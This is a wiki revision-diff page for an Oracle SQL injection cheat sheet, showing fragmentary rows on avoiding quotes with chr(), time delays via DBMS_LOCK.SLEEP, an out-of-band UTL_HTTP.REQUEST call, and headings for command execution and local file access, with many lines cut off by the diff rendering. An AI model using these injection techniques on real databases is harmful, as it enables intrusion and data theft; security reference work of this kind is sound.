hacking:sql_injection_cheat_sheet_oracle
Differences
hacking:sql_injection_cheat_sheet_oracle [2020/04/01 11:22] – peter | hacking:sql_injection_cheat_sheet_oracle [2020/07/15 09:30] (current) – external edit 127.0.0.1 | ||
---|---|---|---|
Line 64: | Line 64: | ||
SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- returns 2 | SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- returns 2 | ||
</ | </ | ||
- | |Avoiding Quotes|SELECT chr(65) || chr(66) FROM dual; -- returns AB| | + | |Avoiding Quotes|< |
|Time Delay|< | |Time Delay|< | ||
BEGIN DBMS_LOCK.SLEEP(5); | BEGIN DBMS_LOCK.SLEEP(5); | ||
Line 76: | Line 76: | ||
SELECT UTL_HTTP.REQUEST(' | SELECT UTL_HTTP.REQUEST(' | ||
</ | </ | ||
- | |Command Execution | | + | |Command Execution |< |
[[http:// | [[http:// | ||
Line 82: | Line 82: | ||
[[http:// | [[http:// | ||
</ | </ | ||
- | |Local File Access| | + | |Local File Access|< |
- | + | ||
[[http:// | [[http:// | ||
SELECT value FROM v$parameter2 WHERE name = ' | SELECT value FROM v$parameter2 WHERE name = ' | ||
Line 99: | Line 98: | ||
SYSTEM | SYSTEM | ||
SYSAUX | SYSAUX | ||
- | </ | + | </ |
---- | ---- |
hacking/sql_injection_cheat_sheet_oracle.1585740152.txt.gz · Last modified: 2020/07/15 09:30 (external edit)